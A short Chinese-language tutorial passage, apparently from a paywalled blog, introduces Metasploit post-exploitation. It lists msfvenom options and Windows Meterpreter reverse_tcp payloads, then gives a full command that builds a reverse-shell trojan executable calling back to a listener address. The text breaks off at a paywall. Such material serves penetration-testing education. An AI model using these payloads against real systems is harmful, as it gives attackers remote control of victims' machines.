使用Metasploit进入后渗透利用阶段
一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)
常用选项
-p //指定生成的Payload
--list payload //列出所支持的Payload类型
--list-options //查看模块所支持的选项
msfvenom -p windows/meterpreter/reverse_tcp --list-options //查看模块所支持的选项
-f //指定生成的文件格式
msfvenom --list formats //查看所支持的文件格式
常用的Windows Payload:
windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)
windows/meterpreter_reverse_tcp
windows/x64/meterpreter/reverse_tcp
1、生成反向木马
使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe

最低0.47元/天 解锁文章
1642

被折叠的 条评论
为什么被折叠?



